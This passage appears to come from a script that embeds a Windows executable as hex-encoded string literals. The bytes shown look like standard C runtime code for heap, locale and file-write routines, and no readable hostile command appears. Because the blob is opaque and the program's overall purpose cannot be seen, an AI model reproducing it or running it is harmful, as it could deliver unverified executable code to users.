'09f7d0a304e04000eb60568d45f850ff1518b140008b75fc3375f8ff1564b0400033f0' \ 'ff15c4b0400033f0ff1514b1400033f08d45f050ff1510b140008b45f43345f033f03b' \ 'f77507be4fe640bbeb0b85f375078bc6c1e0100bf0893500e04000f7d6893504e04000' \ '5e5f5bc9c38325b8fc400000c38bff565733f6bf00fa4000833cf52ce5400001751e8d' \ '04f528e54000893868a00f0000ff3083c718e8720f0000595985c0740c4683fe247cd2' \ '33c0405f5ec38324f528e540000033c0ebf18bff538b1d04b1400056be28e54000578b' \ '3e85ff7413837e0401740d57ffd357e867e0ffff8326005983c60881fe48e640007cdc' \ 'be28e540005f8b0685c07409837e0401750350ffd383c60881fe48e640007ce65e5bc3' \ '8bff558bec8b4508ff34c528e54000ff15d8b040005dc36a0c6840c64000e893ddffff' \ '33ff47897de433db391dfcf940007518e815f7ffff6a1ee863f5ffff68ff000000e856' \ 'd9ffff59598b75088d34f528e54000391e74048bc7eb6e6a18e85fe0ffff598bf83bfb' \ '750fe87cdfffffc7000c00000033c0eb516a0ae85900000059895dfc391e752c68a00f' \ '000057e8690e0000595985c0751757e895dfffff59e846dfffffc7000c000000895de4' \ 'eb0b893eeb0757e87adfffff59c745fcfeffffffe8090000008b45e4e82bddffffc36a' \ '0ae828ffffff59c38bff558bec8b4508568d34c528e54000833e00751350e822ffffff' \ '5985c075086a11e84ad8ffff59ff36ff15d4b040005e5dc38bff558bec53568b75088b' \ '86bc00000033db573bc3746f3d58ed400074688b86b00000003bc3745e3918755a8b86' \ 'b80000003bc374173918751350e8e8deffffffb6bc000000e85537000059598b86b400' \ '00003bc374173918751350e8c7deffffffb6bc000000e8ef3600005959ffb6b0000000' \ 'e8afdeffffffb6bc000000e8a4deffff59598b86c00000003bc37444391875408b86c4' \ '0000002dfe00000050e883deffff8b86cc000000bf800000002bc750e870deffff8b86' \ 'd00000002bc750e862deffffffb6c0000000e857deffff83c4108dbed40000008b073d' \ '98ec400074173998b4000000750f50e8d5340000ff37e830deffff59598d7e50c74508' \ '06000000817ff850e6400074118b073bc3740b3918750750e80bdeffff59395ffc7412' \ '8b47043bc3740b3918750750e8f4ddffff5983c710ff4d0875c756e8e5ddffff595f5e' \ '5b5dc38bff558bec53568b3544b04000578b7d0857ffd68b87b000000085c0740350ff' \ 'd68b87b800000085c0740350ffd68b87b400000085c0740350ffd68b87c000000085c0' \ '740350ffd68d5f50c7450806000000817bf850e6400074098b0385c0740350ffd6837b' \ 'fc00740a8b430485c0740350ffd683c310ff4d0875d68b87d400000005b400000050ff' \ 'd65f5e5b5dc38bff558bec578b7d0885ff0f848300000053568b3548b0400057ffd68b' \ '87b000000085c0740350ffd68b87b800000085c0740350ffd68b87b400000085c07403' \ '50ffd68b87c000000085c0740350ffd68d5f50c7450806000000817bf850e640007409' \ '8b0385c0740350ffd6837bfc00740a8b430485c0740350ffd683c310ff4d0875d68b87' \ 'd400000005b400000050ffd65e5b8bc75f5dc385ff743785c07433568b303bf7742857' \ '8938e8c1feffff5985f6741b56e845ffffff833e0059750f81fe58e64000740756e859' \ 'fdffff598bc75ec333c0c36a0c6860c64000e8eed9ffffe8bbd0ffff8bf0a188ec4000' \ '8546707422837e6c00741ce8a4d0ffff8b706c85f675086a20e859d5ffff598bc6e801' \ 'daffffc36a0ce8d8fcffff598365fc008d466c8b3d30e74000e869ffffff8945e4c745' \ 'fcfeffffffe802000000ebc16a0ce8d3fbffff598b75e4c32da4030000742283e80474' \ '1783e80d740c48740333c0c3b804040000c3b812040000c3b804080000c3b811040000' \ 'c38bff56578bf0680101000033ff8d461c5750e8d6c9ffff33c00fb7c88bc1897e0489' \ '7e08897e0cc1e1100bc18d7e10abababb940e7400083c40c8d461c2bcebf010100008a' \ '14018810404f75f78d861d010000be000100008a14088810404e75f75f5ec38bff558b' \ 'ec81ec1c050000a100e0400033c58945fc53578d85e8faffff50ff7604ff151cb14000' \ 'bf0001000085c00f84fb00000033c0888405fcfeffff403bc772f48a85eefaffffc685' \ 'fcfeffff2084c0742e8d9deffaffff0fb6c80fb6033bc877162bc140508d940dfcfeff' \ 'ff6a2052e813c9ffff83c40c438a034384c075d86a00ff760c8d85fcfaffffff760450' \ '578d85fcfeffff506a016a00e88a36000033db53ff76048d85fcfdffff5750578d85fc' \ 'feffff5057ff760c53e89d3a000083c44453ff76048d85fcfcffff5750578d85fcfeff' \ 'ff506800020000ff760c53e8783a000083c42433c00fb78c45fcfafffff6c101740e80' \ '4c061d108a8c05fcfdffffeb11f6c1027415804c061d208a8c05fcfcffff888c061d01' \ '0000eb08c684061d01000000403bc772beeb568d861d010000c785e4faffff9fffffff' \ '33c92985e4faffff8b95e4faffff8d840e1d01000003d08d5a2083fb19770c804c0e1d' \ '108ad180c220eb0f83fa19770e804c0e1d208ad180ea208810eb03c60000413bcf72c2' \ '8b4dfc5f33cd5be8e2c4ffffc9c36a0c6880c64000e852d7ffffe81fceffff8bf8a188' \ 'ec4000854770741d837f6c0074178b776885f675086a20e8c2d2ffff598bc6e86ad7ff' \ 'ffc36a0de841faffff598365fc008b77688975e43b3568eb4000743685f6741a56ff15' \ '48b0400085c0750f81fe40e74000740756e86cd9ffff59a168eb40008947688b3568eb' \ '40008975e456ff1544b04000c745fcfeffffffe805000000eb8e8b75e46a0de806f9ff' \ 'ff59c38bff558bec83ec105333db538d4df0e874deffff891d74fb400083fefe751ec7' \ '0574fb400001000000ff1524b14000385dfc74458b4df8836170fdeb3c83fefd7512c7' \ '0574fb400001000000ff1520b14000ebdb83fefc75128b45f08b4004c70574fb400001' \ '000000ebc4385dfc74078b45f8836070fd8bc65bc9c38bff558bec83ec20a100e04000' \ '33c58945fc538b5d0c568b750857e864ffffff8bf833f6897d083bfe750e8bc3e8b7fc' \ 'ffff33c0e99d0100008975e433c039b870eb40000f8491000000ff45e483c0303df000' \ '000072e781ffe8fd00000f847001000081ffe9fd00000f84640100000fb7c750ff1528' \ 'b1400085c00f84520100008d45e85057ff151cb1400085c00f84330100006801010000' \ '8d431c5650e833c6ffff33d24283c40c897b0489730c3955e80f86f8000000807dee00' \ '0f84cf0000008d75ef8a0e84c90f84c20000000fb646ff0fb6c9e9a600000068010100' \ '008d431c5650e8ecc5ffff8b4de483c40c6bc9308975e08db180eb40008975e4eb2a8a' \ '460184c074280fb63e0fb6c0eb128b45e08a806ceb400008443b1d0fb64601473bf876' \ 'ea8b7d084646803e0075d18b75e4ff45e083c608837de0048975e472e98bc7897b04c7' \ '430801000000e867fbffff6a0689430c8d43108d8974eb40005a668b31416689304140' \ '404a75f38bf3e8d7fbffffe9b7feffff804c031d04403bc176f64646807eff000f8534' \ 'ffffff8d431eb9fe000000800808404975f98b4304e812fbffff89430c895308eb0389' \ '730833c00fb7c88bc1c1e1100bc18d7b10abababeba8393574fb40000f8558feffff83' \ 'c8ff8b4dfc5f5e33cd5be8ddc1ffffc9c36a1468a0c64000e84dd4ffff834de0ffe816' \ 'cbffff8bf8897ddce8dcfcffff8b5f688b7508e875fdffff8945083b43040f84570100' \ '006820020000e826d7ffff598bd885db0f8446010000b9880000008b77688bfbf3a583' \ '230053ff7508e8b8fdffff59598945e085c00f85fc0000008b75dcff7668ff1548b040' \ '0085c075118b46683d40e74000740750e848d6ffff59895e68538b3d44b04000ffd7f6' \ '4670020f85ea000000f60588ec4000010f85dd0000006a0de8c2f6ffff598365fc008b' \ '4304a384fb40008b4308a388fb40008b430ca38cfb400033c08945e483f8057d10668b' \ '4c431066890c4578fb400040ebe833c08945e43d010100007d0d8a4c181c888860e940' \ '0040ebe933c08945e43d000100007d108a8c181d010000888868ea400040ebe6ff3568' \ 'eb4000ff1548b0400085c07513a168eb40003d40e74000740750e88fd5ffff59891d68' \ 'eb400053ffd7c745fcfeffffffe802000000eb306a0de83bf5ffff59c3eb2583f8ff75' \ '2081fb40e74000740753e859d5ffff59e80ad5ffffc70016000000eb048365e0008b45' \ 'e0e805d3ffffc3833d140e41000075126afde856feffff59c705140e41000100000033' \ 'c0c38bff558bec51535657ff35100e4100e8d6c6ffffff350c0e41008bf8897dfce8c6' \ 'c6ffff8bf059593bf70f82830000008bde2bdf8d430483f804727757e8113500008bf8' \ '8d4304593bf87348b8000800003bf873028bc703c73bc7720f50ff75fce8d9d5ffff59' \ '5985c075168d47103bc7724050ff75fce8c3d5ffff595985c07431c1fb02508d3498e8' \ 'e1c5ffff59a3100e4100ff7508e8d3c5ffff890683c60456e8c8c5ffff59a30c0e4100' \ '8b450859eb0233c05f5e5bc9c38bff566a046a20e82dd5ffff8bf056e8a1c5ffff83c4' \ '0ca3100e4100a30c0e410085f675056a18585ec383260033c05ec36a0c68c0c64000e8' \ 'aad1ffffe8a6cdffff8365fc00ff7508e8f8feffff598945e4c745fcfeffffffe80900' \ '00008b45e4e8c6d1ffffc3e885cdffffc38bff558becff7508e8b7fffffff7d81bc0f7' \ 'd859485dc38bff565733ff8db760ec4000ff36e81ec5ffff83c70459890683ff2872e8' \ '5f5ec36a0868e0c64000e836d1ffffe803c8ffff8b407885c074168365fc00ffd0eb07' \ '33c040c38b65e8c745fcfeffffffe86d340000e84fd1ffffc368a6594000e8cdc4ffff' \ '59a390fb4000c38bff558bec8b4508a394fb4000a398fb4000a39cfb4000a3a0fb4000' \ '5dc38bff558bec8b45088b0d2ce0400056395004740f8bf16bf60c03750883c00c3bc6' \ '72ec6bc90c034d085e3bc17305395004740233c05dc3ff359cfb4000e8e1c4ffff59c3' \ '6a206800c74000e88ad0ffff33ff897de4897dd88b5d0883fb0b7f4c74158bc36a0259' \ '2bc174222bc174082bc174642bc17544e8b7c6ffff8bf8897dd885ff751483c8ffe961' \ '010000be94fb4000a194fb4000eb60ff775c8bd3e85dffffff8bf083c6088b06eb5a8b' \ 'c383e80f743c83e806742b48741ce850d2ffffc7001600000033c05050505050e82bd5' \ 'ffff83c414ebaebe9cfb4000a19cfb4000eb16be98fb4000a198fb4000eb0abea0fb40' \ '00a1a0fb4000c745e40100000050e81dc4ffff8945e05933c0837de0010f84d8000000' \ '3945e075076a03e8d3cdffff3945e4740750e8d1f2ffff5933c08945fc83fb08740a83' \ 'fb0b740583fb04751b8b4f60894dd489476083fb0875408b4f64894dd0c747648c0000' \ '0083fb08752e8b0d20e04000894ddc8b0d24e040008b1520e0400003ca394ddc7d198b' \ '4ddc6bc90c8b575c89441108ff45dcebdbe885c3ffff8906c745fcfeffffffe8150000' \ '0083fb08751fff776453ff55e059eb198b5d088b7dd8837de40074086a00e85ff1ffff' \ '59c353ff55e05983fb08740a83fb0b740583fb0475118b45d489476083fb0875068b45' \ 'd089476433c0e82ccfffffc38bff558bec8b4508a3a8fb40005dc38bff558bec8b4508' \ 'a3b4fb40005dc38bff558bec8b4508a3b8fb40005dc36a106820c74000e8adceffff83' \ '65fc00ff750cff7508ff1530b140008945e4eb2f8b45ec8b008b008945e033c93d1700' \ '00c00f94c18bc1c38b65e8817de0170000c075086a08ff15c0b040008365e400c745fc' \ 'feffffff8b45e4e89fceffffc38bff558bec8b4508a3bcfb40005dc38bff558becff35' \ 'bcfb4000e883c2ffff5985c0740fff7508ffd05985c0740533c0405dc333c05dc3cccc' \ '5356578b5424108b4424148b4c2418555250515168585d400064ff3500000000a100e0' \ '400033c489442408648925000000008b4424308b58088b4c242c33198b700c83fefe74' \ '3b8b54243483fafe74043bf2762e8d34768d5cb3108b0b89480c837b040075cc680101' \ '00008b4308e83a330000b9010000008b4308e84c330000ebb0648f050000000083c418' \ '5f5e5bc38b4c2404f7410406000000b80100000074338b4424088b480833c8e8f2baff' \ 'ff558b6818ff700cff7010ff7014e83effffff83c40c5d8b4424088b5424108902b803' \ '000000c3558b4c24088b29ff711cff7118ff7128e815ffffff83c40c5dc20400555657' \ '538bea33c033db33d233f633ffffd15b5f5e5dc38bea8bf18bc16a01e89732000033c0' \ '33db33c933d233ffffe6558bec5356576a006a0068ff5d400051e8bf4500005f5e5b5d' \ 'c3558b6c24085251ff742414e8b4feffff83c40c5dc208008bff558bec8b0da0fc4000' \ 'a1a4fc40006bc91403c8eb118b55082b500c81fa00001000720983c0143bc172eb33c0' \ '5dc38bff558bec83ec108b4d088b4110568b750c578bfe2b790c83c6fcc1ef0f8bcf69' \ 'c9040200008d8c0144010000894df08b0e49894dfcf6c1010f85d3020000538d1c318b' \ '138955f48b56fc8955f88b55f4895d0cf6c2017574c1fa044a83fa3f76036a3f5a8b4b' \ '043b4b087542bb0000008083fa2073198bcad3eb8d4c0204f7d3215cb844fe0975238b' \ '4d082119eb1c8d4ae0d3eb8d4c0204f7d3219cb8c4000000fe0975068b4d082159048b' \ '5d0c8b53088b5b048b4dfc034df4895a048b550c8b5a048b5208895308894dfc8bd1c1' \ 'fa044a83fa3f76036a3f5a8b5df883e301895df40f858f0000002b75f88b5df8c1fb04' \ '6a3f89750c4b5e3bde76028bde034df88bd1c1fa044a894dfc3bd676028bd63bda745e' \ '8b4d0c8b71043b7108753bbe0000008083fb2073178bcbd3eef7d62174b844fe4c0304' \ '75218b4d082131eb1a8d4be0d3eef7d621b4b8c4000000fe4c030475068b4d08217104' \ '8b4d0c8b71088b4904894e048b4d0c8b71048b4908894e088b750ceb038b5d08837df4' \ '0075083bda0f84800000008b4df08d0cd18b5904894e08895e048971048b4e04897108' \ '8b4e043b4e0875608a4c0204884d0ffec1884c020483fa207325807d0f00750e8bcabb' \ '00000080d3eb8b4d080919bb000000808bcad3eb8d44b8440918eb29807d0f0075108d' \ '4ae0bb00000080d3eb8b4d080959048d4ae0ba00000080d3ea8d84b8c400000009108b' \ '45fc8906894430fc8b45f0ff080f85f3000000a1c0fb400085c00f84d80000008b0db4' \ 'fc40008b350cb140006800400000c1e10f03480cbb008000005351ffd68b0db4fc4000' \ 'a1c0fb4000ba00000080d3ea095008a1c0fb40008b40108b0db4fc400083a488c40000' \ '0000a1c0fb40008b4010fe4843a1c0fb40008b4810807943007509836004fea1c0fb40' \ '00837808ff7565536a00ff700cffd6a1c0fb4000ff70106a00ff35fcf94000ff15d0b0' \ '40008b0da0fc4000a1c0fb40006bc9148b15a4fc40002bc88d4c11ec518d48145150e8' \ '742f00008b450883c40cff0da0fc40003b05c0fb40007604836d0814a1a4fc4000a3ac' \ 'fc40008b4508a3c0fb4000893db4fc40005b5f5ec9c3a1b0fc4000568b35a0fc400057' \ '33ff3bf0753483c0106bc01450ff35a4fc400057ff35fcf94000ff1540b140003bc775' \ '0433c0eb788305b0fc4000108b35a0fc4000a3a4fc40006bf6140335a4fc400068c441' \ '00006a08ff35fcf94000ff1538b140008946103bc774c76a0468002000006800001000' \ '57ff153cb1400089460c3bc77512ff761057ff35fcf94000ff15d0b04000eb9b834e08' \ 'ff893e897e04ff05a0fc40008b46108308ff8bc65f5ec38bff558bec51518b4d088b41' \ '0853568b71105733dbeb0303c04385c07df98bc369c0040200008d8430440100006a3f' \ '8945f85a89400889400483c0084a75f46a048bfb6800100000c1e70f03790c68008000' \ '0057ff153cb1400085c0750883c8ffe99d0000008d97007000008955fc3bfa77438bca' \ '2bcfc1e90c8d4710418348f8ff8388ec0f0000ff8d90fc0f000089108d90fcefffffc7' \ '40fcf00f0000895004c780e80f0000f00f000005001000004975cb8b55fc8b45f805f8' \ '0100008d4f0c8948048941088d4a0c89480889410483649e440033ff4789bc9ec40000' \ '008a46438ac8fec184c08b4508884e437503097804ba000000808bcbd3eaf7d2215008' \ '8bc35f5e5bc9c38bff558bec83ec0c8b4d088b411053568b7510578b7d0c8bd72b510c' \ '83c617c1ea0f8bca69c9040200008d8c0144010000894df48b4ffc83e6f0493bf18d7c' \ '39fc8b1f894d10895dfc0f8e55010000f6c3010f854501000003d93bf30f8f3b010000' \ '8b4dfcc1f90449894df883f93f76066a3f59894df88b5f043b5f087543bb0000008083' \ 'f920731ad3eb8b4df88d4c0104f7d3215c9044fe0975268b4d082119eb1f83c1e0d3eb' \ '8b4df88d4c0104f7d3219c90c4000000fe0975068b4d082159048b4f088b5f04895904' \ '8b4f048b7f088979088b4d102bce014dfc837dfc000f8ea50000008b7dfc8b4d0cc1ff' \ '044f8d4c31fc83ff3f76036a3f5f8b5df48d1cfb895d108b5b048959048b5d10895908' \ '894b048b5904894b088b59043b590875578a4c0704884d13fec1884c070483ff20731c' \ '807d1300750e8bcfbb00000080d3eb8b4d0809198d4490448bcfeb20807d130075108d' \ '4fe0bb00000080d3eb8b4d080959048d8490c40000008d4fe0ba00000080d3ea09108b' \ '550c8b4dfc8d4432fc8908894c01fceb038b550c8d46018942fc894432f8e93c010000' \ '33c0e9380100000f8d2f0100008b5d0c2975108d4e01894bfc8d5c33fc8b7510c1fe04' \ '4e895d0c894bfc83fe3f76036a3f5ef645fc010f85800000008b75fcc1fe044e83fe3f' \ '76036a3f5e8b4f043b4f087542bb0000008083fe2073198bced3eb8d740604f7d3215c' \ '9044fe0e75238b4d082119eb1c8d4ee0d3eb8d4c0604f7d3219c90c4000000fe097506' \ '8b4d082159048b5d0c8b4f088b77048971048b77088b4f048971088b75100375fc8975' \ '10c1fe044e83fe3f76036a3f5e8b4df48d0cf18b7904894b08897b048959048b4b0489' \ '59088b4b043b4b0875578a4c0604884d0ffec1884c060483fe20731c807d0f00750e8b' \ 'cebf00000080d3ef8b4d0809398d4490448bceeb20807d0f0075108d4ee0bf00000080' \ 'd3ef8b4d080979048d8490c40000008d4ee0ba00000080d3ea09108b45108903894418' \ 'fc33c0405f5e5bc9c38bff558bec83ec14a1a0fc40008b4d086bc0140305a4fc400083' \ 'c11783e1f0894df0c1f904534983f92056577d0b83ceffd3ee834df8ffeb0d83c1e083' \ 'caff33f6d3ea8955f88b0dacfc40008bd9eb118b53048b3b2355f823fe0bd7750a83c3' \ '14895d083bd872e83bd8757f8b1da4fc4000eb118b53048b3b2355f823fe0bd7750a83' \ 'c314895d083bd972e83bd9755beb0c837b0800750a83c314895d083bd872f03bd87531' \ '8b1da4fc4000eb09837b0800750a83c314895d083bd972f03bd97515e8a0faffff8bd8' \ '895d0885db750733c0e90902000053e83afbffff598b4b1089018b43108338ff74e589' \ '1dacfc40008b43108b108955fc83faff74148b8c90c40000008b7c9044234df823fe0b' \ 'cf75298365fc008b90c40000008d48448b392355f823fe0bd7750eff45fc8b91840000' \ '0083c104ebe78b55fc8bca69c9040200008d8c0144010000894df48b4c904433ff23ce' \ '75128b8c90c4000000234df86a205feb0303c94785c97df98b4df48b54f9048b0a2b4d' \ 'f08bf1c1fe044e83fe3f894df87e036a3f5e3bf70f84010100008b4a043b4a08755c83' \ 'ff20bb000000807d268bcfd3eb8b4dfc8d7c3804f7d3895dec235c8844895c8844fe0f' \ '75338b4dec8b5d08210beb2c8d4fe0d3eb8b4dfc8d8c88c40000008d7c3804f7d32119' \ 'fe0f895dec750b8b5d088b4dec214b04eb038b5d08837df8008b4a088b7a048979048b' \ '4a048b7a088979080f848d0000008b4df48d0cf18b7904894a08897a048951048b4a04' \ '8951088b4a043b4a08755e8a4c0604884d0bfec183fe20884c06047d23807d0b00750b' \ 'bf000000808bced3ef093b8bcebf00000080d3ef8b4dfc097c8844eb29807d0b00750d' \ '8d4ee0bf00000080d3ef097b048b4dfc8dbc88c40000008d4ee0be00000080d3ee0937' \ '8b4df885c9740b890a894c11fceb038b4df88b75f003d18d4e01890a894c32fc8b75f4' \ '8b0e8d7901893e85c9751a3b1dc0fb400075128b4dfc3b0db4fc400075078325c0fb40' \ '00008b4dfc89088d42045f5e5bc9c36a0c6840c74000e8fdc1ffff8365e4008b75083b' \ '35a8fc400077226a04e80be5ffff598365fc0056e8eefcffff598945e4c745fcfeffff' \ 'ffe8090000008b45e4e809c2ffffc36a04e806e4ffff59c38bff558bec568b750883fe' \ 'e00f87a100000053578b3d38b14000833dfcf94000007518e829dbffff6a1ee877d9ff' \ 'ff68ff000000e86abdffff5959a1bcfc400083f801750e85f674048bc6eb0333c04050' \ 'eb1c83f803750b56e853ffffff5985c0751685f675014683c60f83e6f0566a00ff35fc' \ 'f94000ffd78bd885db752e6a0c5e3905e4fb40007415ff7508e8def2ffff5985c0740f' \ '8b7508e97bffffffe84cc3ffff8930e845c3ffff89305f8bc35beb1456e8b7f2ffff59' \ 'e831c3ffffc7000c00000033c05e5dc36a0c6860c74000e8e4c0ffff8b4d0833ff3bcf' \ '762e6ae05833d2f7f13b450c1bc040751fe8fdc2ffffc7000c0000005757575757e8da' \ 'c5ffff83c41433c0e9d50000000faf4d0c8bf18975083bf7750333f64633db895de483' \ 'fee07769833dbcfc400003754b83c60f83e6f089750c8b45083b05a8fc400077376a04' \ 'e893e3ffff59897dfcff7508e875fbffff598945e4c745fcfeffffffe85f0000008b5d' \ 'e43bdf7411ff75085753e8dab0ffff83c40c3bdf7561566a08ff35fcf94000ff1538b1' \ '40008bd83bdf754c393de4fb4000743356e8cef1ffff5985c00f8572ffffff8b45103b' \ 'c70f8450ffffffc7000c000000e945ffffff33ff8b750c6a04e837e2ffff59c33bdf75' \ '0d8b45103bc77406c7000c0000008bc3e818c0ffffc36a106880c74000e8c6bfffff8b' \ '5d0885db750eff750ce8fdfdffff59e9cc0100008b750c85f6750c53e823c2ffff59e9' \ 'b7010000833dbcfc4000030f859301000033ff897de483fee00f878a0100006a04e8a0' \ 'e2ffff59897dfc53e8a5f2ffff598945e03bc70f849e0000003b35a8fc400077495653' \ '50e887f7ffff83c40c85c07405895de4eb3556e856faffff598945e43bc774278b43fc' \ '483bc672028bc65053ff75e4e8e014000053e855f2ffff8945e05350e87bf2ffff83c4' \ '18397de475483bf7750633f64689750c83c60f83e6f089750c5657ff35fcf94000ff15' \ '38b140008945e43bc774208b43fc483bc672028bc65053ff75e4e88c14000053ff75e0' \ 'e82ef2ffff83c414c745fcfeffffffe82e000000837de000753185f675014683c60f83' \ 'e6f089750c56536a00ff35fcf94000ff1540b140008bf8eb128b750c8b5d086a04e8d1' \ 'e0ffff59c38b7de485ff0f85bf000000393de4fb4000742c56e822f0ffff5985c00f85' \ 'd2feffffe894c0ffff397de0756c8bf0ff1580b0400050e83fc0ffff598906eb5f85ff' \ '0f8583000000e86fc0ffff397de07468c7000c000000eb7185f675014656536a00ff35' \ 'fcf94000ff1540b140008bf885ff75563905e4fb4000743456e8b9efffff5985c0741f' \ '83fee076cd56e8a9efffff59e823c0ffffc7000c00000033c0e825beffffc3e810c0ff' \ 'ffe97cffffff85ff7516e802c0ffff8bf0ff1580b0400050e8b2bfffff8906598bc7eb' \ 'd26a1068a0c74000e8abbdffff33db895de46a01e8c3e0ffff59895dfc6a035f897de0' \ '3b3d000e41007d578bf7c1e602a1e4fd400003c6391874448b00f6400c83740f50e803' \ '2700005983f8ff7403ff45e483ff147c28a1e4fd40008b040683c02050ff1504b14000' \ 'a1e4fd4000ff3406e8c1bfffff59a1e4fd4000891c0647eb9ec745fcfeffffffe80900' \ '00008b45e4e867bdffffc36a01e864dfffff59c38bff558bec53568b75088b460c8bc8' \ '80e10333db80f9027540a90801000074398b4608578b3e2bf885ff7e2c575056e8c301' \ '00005950e8bb0d000083c40c3bc7750f8b460c84c0790f83e0fd89460ceb07834e0c20' \ '83cbff5f8b46088366040089065e8bc35b5dc38bff558bec568b750885f6750956e835' \ '00000059eb2f56e87cffffff5985c0740583c8ffeb1ff7460c00400000741456e85a01' \ '000050e88526000059f7d8591bc0eb0233c05e5dc36a1468c0c74000e85cbcffff33ff' \ '897de4897ddc6a01e871dfffff59897dfc33f68975e03b35000e41000f8d83000000a1' \ 'e4fd40008d04b03938745e8b00f6400c8374565056e87ec2ffff595933d2428955fca1' \ 'e4fd40008b04b08b480cf6c183742f395508751150e84affffff5983f8ff741eff45e4' \ 'eb19397d087514f6c102740f50e82fffffff5983f8ff75030945dc897dfce808000000' \ '46eb8433ff8b75e0a1e4fd4000ff34b056e887c2ffff5959c3c745fcfeffffffe81200' \ '0000837d08018b45e474038b45dce8ddbbffffc36a01e8daddffff59c36a01e81fffff' \ 'ff59c38bff558bec8b450883f8fe750fe8a9bdffffc7000900000033c05dc35633f63b' \ 'c67c083b05c0fc4000721ce88bbdffff5656565656c70009000000e868c0ffff83c414' \ '33c0eb1a8bc883e01fc1f9058b0c8de0fc4000c1e0060fbe44010483e0405e5dc38bff' \ '558bec8b45085633f63bc6751de843bdffff5656565656c70016000000e820c0ffff83' \ 'c41483c8ffeb038b40105e5dc3cccccccccccccc8b4c2404f7c10300000074248a0183' \ 'c10184c0744ef7c10300000075ef05000000008da424000000008da424000000008b01' \ 'bafffefe7e03d083f0ff33c283c104a90001018174e88b41fc84c0743284e47424a900' \ '00ff007413a9000000ff7402ebcd8d41ff8b4c24042bc1c38d41fe8b4c24042bc1c38d' \ '41fd8b4c24042bc1c38d41fc8b4c24042bc1c38bff558bec83ec1053568b750c33db57' \ '8b7d103bf375143bfb76108b45083bc37402891833c0e9830000008b45083bc3740383' \ '08ff81ffffffff7f761be851bcffff6a165e53535353538930e82fbfffff83c4148bc6' \ 'eb56ff75188d4df0e8c8c1ffff8b45f03958140f859c000000668b4514b9ff00000066' \ '3bc176363bf3740f3bfb760b575356e868aaffff83c40ce8febbffffc7002a000000e8' \ 'f3bbffff8b00385dfc74078b4df8836170fd5f5e5bc9c33bf374323bfb772ce8d3bbff' \ 'ff6a225e53535353538930e8b1beffff83c414385dfc0f8479ffffff8b45f8836070fd' \ 'e96dffffff88068b45083bc37406c70001000000385dfc0f8425ffffff8b45f8836070' \ 'fde919ffffff8d4d0c515357566a018d4d145153895d0cff7004ff15f0b040003bc374' \ '14395d0c0f855effffff8b4d083bcb74bd8901ebb9ff1580b0400083f87a0f8544ffff' \ 'ff3bf30f8467ffffff3bfb0f865fffffff575356e891a9ffff83c40ce94fffffff8bff' \ '558bec6a00ff7514ff7510ff750cff7508e87cfeffff83c4145dc38bff558bec83ec10' \ 'ff750c8d4df0e88fc0ffff0fb645088b4df08b89c80000000fb704412500800000807d' \ 'fc0074078b4df8836170fdc9c38bff558bec6a00ff7508e8b9ffffff59595dc3cc568b' \ '4424140bc075288b4c24108b44240c33d2f7f18bd88b442408f7f18bf08bc3f7642410' \ '8bc88bc6f764241003d1eb478bc88b5c24108b54240c8b442408d1e9d1dbd1ead1d80b' \ 'c975f4f7f38bf0f76424148bc88b442410f7e603d1720e3b54240c7708720f3b442408' \ '76094e2b4424101b54241433db2b4424081b54240cf7daf7d883da008bca8bd38bd98b' \ 'c88bc65ec210008bff558bec51518b450c568b75088945f88b451057568945fce8a625' \ '000083cfff593bc77511e8feb9ffffc700090000008bc78bd7eb4aff75148d4dfc51ff' \ '75f850ff1544b140008945f83bc77513ff1580b0400085c0740950e8f0b9ffff59ebcf' \ '8bc6c1f8058b0485e0fc400083e61fc1e6068d4430048020fd8b45f88b55fc5f5ec9c3' \ '6a1468e8c74000e862b7ffff83ceff8975dc8975e08b450883f8fe751ce895b9ffff83' \ '2000e87ab9ffffc700090000008bc68bd6e9d000000033ff3bc77c083b05c0fc400072' \ '21e86bb9ffff8938e851b9ffffc700090000005757575757e82ebcffff83c414ebc88b' \ 'c8c1f9058d1c8de0fc40008bf083e61fc1e6068b0b0fbe4c310483e1017526e82ab9ff' \ 'ff8938e810b9ffffc700090000005757575757e8edbbffff83c41483caff8bc2eb5b50' \ 'e80225000059897dfc8b03f644300401741cff7514ff7510ff750cff7508e8a9feffff' \ '83c4108945dc8955e0eb1ae8c2b8ffffc70009000000e8cab8ffff8938834ddcff834d' \ 'e0ffc745fcfeffffffe80c0000008b45dc8b55e0e8a5b6ffffc3ff7508e83f25000059' \ 'c38bff558becb8e41a0000e85ea7ffffa100e0400033c58945fc8b450c5633f6898534' \ 'e5ffff89b538e5ffff89b530e5ffff397510750733c0e9e90600003bc67527e858b8ff' \ 'ff8930e83eb8ffff5656565656c70016000000e81bbbffff83c41483c8ffe9be060000' \ '53578b7d088bc7c1f8058d3485e0fc40008b0683e71fc1e70603c78a582402dbd0fb89' \ 'b528e5ffff889d27e5ffff80fb02740580fb0175308b4d10f7d1f6c1017526e8efb7ff' \ 'ff33f68930e8d3b7ffff5656565656c70016000000e8b0baffff83c414e943060000f6' \ '40042074116a026a006a00ff7508e87efdffff83c410ff7508e8e1f9ffff5985c00f84' \ '9d0200008b06f6440704800f8490020000e81dacffff8b406c33c93948148d851ce5ff' \ 'ff0f94c1508b06ff3407898d20e5ffffff154cb1400085c00f846002000033c9398d20' \ 'e5ffff740884db0f8450020000ff1548b140008b9d34e5ffff89851ce5ffff33c08985' \ '3ce5ffff3945100f8642050000898544e5ffff8a8527e5ffff84c00f85670100008a0b' \ '8bb528e5ffff33c080f90a0f94c0898520e5ffff8b0603c78378380074158a50348855' \ 'f4884df5836038006a028d45f450eb4b0fbec150e8fdfbffff5985c0743a8b8d34e5ff' \ 'ff2bcb034d1033c0403bc80f86a50100006a028d8540e5ffff5350e85a25000083c40c' \ '83f8ff0f84b104000043ff8544e5ffffeb1b6a01538d8540e5ffff50e83625000083c4' \ '0c83f8ff0f848d04000033c050506a058d4df4516a018d8d40e5ffff5150ffb51ce5ff' \ 'ff43ff8544e5ffffff15f0b040008bf085f60f845c0400006a008d853ce5ffff50568d' \ '45f4508b8528e5ffff8b00ff3407ff153cb0400085c00f84290400008b8544e5ffff8b' \ '8d30e5ffff03c139b53ce5ffff898538e5ffff0f8c1504000083bd20e5ffff000f84cd' \ '0000006a008d853ce5ffff506a018d45f4508b8528e5ffff8b00c645f40dff3407ff15' \ '3cb0400085c00f84d003000083bd3ce5ffff010f8ccf030000ff8530e5ffffff8538e5' \ 'ffffe9830000003c0174043c0275210fb73333c96683fe0a0f94c14343838544e5ffff' \ '0289b540e5ffff898d20e5ffff3c0174043c027552ffb540e5ffffe84322000059663b' \ '8540e5ffff0f8568030000838538e5ffff0283bd20e5ffff0074296a0d5850898540e5' \ 